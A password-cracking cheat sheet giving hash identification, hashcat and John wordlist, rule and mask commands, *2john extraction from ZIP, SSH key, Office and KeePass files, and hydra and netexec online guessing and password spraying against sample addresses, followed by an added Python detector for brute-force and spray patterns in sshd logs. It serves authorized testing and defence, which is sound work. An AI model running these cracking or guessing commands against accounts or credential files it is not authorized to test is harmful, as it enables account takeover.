CyberCheatsheets

Password Cracking Cheat Sheet

Password cracking workflow: identify the hash, pick the right mode, and crack offline (hashcat/john) or online (hydra) on authorized targets.

Passwords & Cracking | hashcat, hashes, hydra, john, password-cracking | Updated 2026-06-17

Overview

Password cracking splits into offline (you have the hash, crack it with hashcat/john) and online (you guess against a live service with hydra/netexec). The workflow is always: identify the hash type, choose an attack (wordlist, rules, mask, hybrid), then run. This sheet ties together hash-id, hashcat, john, and hydra into one reference.

Authorized testing only. Crack only hashes and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Identify the hash

Identify hash type and show the hashcat mode (-m)

hashid -m 'HASH'

Interactive identifier (alternative)

hash-identifier

name-that-hash — modern identifier with hashcat/john refs

nth --text 'HASH'

hashcat (GPU, fast)

MD5, straight wordlist attack

hashcat -m 0 -a 0 hashes.txt rockyou.txt

NTLM with the best64 rule set

hashcat -m 1000 ntlm.txt rockyou.txt -r rules/best64.rule

sha512crypt (Linux /etc/shadow)

hashcat -m 1800 sha512.txt rockyou.txt

WPA/WPA2 handshake

hashcat -m 22000 capture.hc22000 wordlist.txt

Mask/brute attack (Ulllldd pattern)

hashcat -m 0 -a 3 hashes.txt '?u?l?l?l?l?d?d'

Show already-cracked results from the potfile

hashcat -m 1000 ntlm.txt --show

John the Ripper

Wordlist mode

john --wordlist=rockyou.txt hashes.txt

Force a hash format

john --format=raw-md5 --wordlist=rockyou.txt hashes.txt

Apply mangling rules

john --rules --wordlist=rockyou.txt hashes.txt

Display cracked passwords

john --show hashes.txt

Combine passwd+shadow for John

unshadow /etc/passwd /etc/shadow > unshadowed.txt

Format converters (*2john)

Extract a crackable hash from a ZIP

zip2john secret.zip > zip.hash

From an encrypted SSH private key

ssh2john id_rsa > ssh.hash

From a password-protected Office file

office2john doc.docx > office.hash

From a KeePass database

keepass2john db.kdbx > kp.hash

Online cracking (hydra)

SSH single-user, password list

hydra -l admin -P rockyou.txt ssh://10.10.10.5

FTP user+pass lists

hydra -L users.txt -P pass.txt ftp://10.10.10.5

HTTP POST login form

hydra -l admin -P pass.txt 10.10.10.5 http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'

Password spray over SMB

nxc smb 10.10.10.0/24 -u users.txt -p 'Spring2026!' --continue-on-success

Tips

  • Identify the hash first — the wrong mode/format wastes hours. hashid/nth give you the exact -m/--format.
  • Wordlist + rules (best64, OneRuleToRuleThemAll) cracks far more than a raw wordlist alone.
  • hashcat is GPU-accelerated and much faster than John for large jobs; John shines for odd formats and *2john tools.
  • Online attacks are slow and noisy — watch lockout policy; prefer offline cracking whenever you have the hash.
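
Added example (not part of the original cheat sheet): how the two online patterns above look from the defender's side in sshd logs, one user with many guesses versus many users with one guess each. The sample log lines, the 192.0.2.x addresses, the thresholds and the function name classify_sources are all constructed for illustration.

```python
import re
from collections import defaultdict

def _fail(user, ip, invalid=False):
    """Build one constructed sshd 'Failed password' line (sample data only)."""
    who = f"invalid user {user}" if invalid else user
    return f"Jan  1 10:00:00 host sshd[101]: Failed password for {who} from {ip} port 40000 ssh2"

# Constructed sample log; addresses are from the 192.0.2.0/24 documentation range.
SAMPLE_LOG = "\n".join(
    [_fail("admin", "192.0.2.10") for _ in range(6)]      # one user, many guesses
    + [_fail(u, "192.0.2.20", invalid=(u == "erin"))      # many users, one guess each
       for u in ("alice", "bob", "carol", "dave", "erin")]
    + [_fail("alice", "192.0.2.30") for _ in range(2)]    # a user mistyping twice
    + ["Jan  1 10:00:09 host sshd[101]: Accepted password for alice from 192.0.2.30 port 40000 ssh2"]
)

FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def classify_sources(log_text, guess_threshold=5, user_threshold=4):
    """Label each source IP as 'spray', 'brute-force' or 'benign'.

    Thresholds are illustrative assumptions; tune them to the lockout policy.
    """
    failures = defaultdict(lambda: defaultdict(int))  # ip -> user -> failed count
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            failures[ip][user] += 1
    verdicts = {}
    for ip, users in failures.items():
        if len(users) >= user_threshold:
            # Each account sees too few failures to lock out, so count per source.
            verdicts[ip] = "spray"
        elif max(users.values()) >= guess_threshold:
            verdicts[ip] = "brute-force"
        else:
            verdicts[ip] = "benign"
    return verdicts

if __name__ == "__main__":
    for ip, label in sorted(classify_sources(SAMPLE_LOG).items()):
        print(ip, label)
```

A per-account lockout counter alone never fires on the spray source here, which is why the check groups failures by source address as well as by user.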
